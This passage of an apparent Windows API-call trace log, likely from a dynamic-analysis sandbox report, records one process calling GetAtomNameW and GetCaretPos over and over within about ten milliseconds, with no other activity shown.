GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.091] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.091] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.091] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.091] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.091] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.091] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.091] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.091] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.091] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.091] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.092] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.092] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.092] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.092] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.092] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.092] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.092] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.092] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.092] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.092] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.092] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.092] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.092] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.092] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.092] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.092] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.092] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.092] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.092] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.092] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.092] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.092] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.092] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.092] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.092] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.092] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.092] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.092] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.093] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.093] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.093] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.093] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.093] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.093] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.093] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.093] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.093] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.093] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.093] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.093] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.093] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.093] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.093] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.093] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.093] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.093] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.093] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.093] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.093] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.093] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.093] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.093] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.093] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.093] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.094] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.094] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.094] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.094] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.094] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.094] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.094] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.094] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.094] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.094] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.094] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.094] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.094] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.094] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.094] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.094] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.094] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.094] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.094] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.094] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.094] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.094] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.094] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.094] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.094] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.094] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.094] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.094] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.094] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.095] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.095] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.095] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.095] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.095] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.095] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.095] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.095] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.095] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.095] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.095] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.095] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.095] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.095] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.095] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.095] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.095] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.095] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.095] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.095] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.095] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.095] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.095] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.095] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.095] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.095] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.095] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.095] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.096] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.096] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.096] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.096] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.096] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.096] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.096] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.096] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.096] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.096] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.096] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.096] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.096] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.096] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.096] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.096] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.096] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.096] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.096] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.096] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.096] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.096] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.096] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.096] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.096] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.096] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.096] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.096] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.097] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.097] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.097] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.097] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.097] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.097] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.097] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.097] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.097] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.097] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.097] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.097] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.097] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.097] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.097] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.097] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.097] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.097] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.097] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.097] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.097] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.097] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.097] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.097] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.097] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.097] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.097] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.097] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.097] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.097] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.098] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.098] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.098] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.098] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.098] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.098] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.098] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.098] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.098] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.098] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.098] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.098] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.098] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.098] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.098] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.098] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.098] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.098] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.098] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.098] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.098] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.098] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.098] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.098] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.098] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.098] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.099] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.099] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.099] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.099] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.099] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.099] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.099] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.099] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.099] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.099] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.099] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.099] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.099] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.099] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.099] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.099] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.099] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.099] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.099] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.099] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.099] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.099] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.099] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.099] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.099] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.099] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.099] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.099] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.099] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.099] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.100] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.100] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.100] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.100] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.100] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.100] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.100] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.100] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.100] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.100] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.100] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.100] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.100] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.100] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.100] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.100] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.100] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.100] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0043.100] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0043.100] 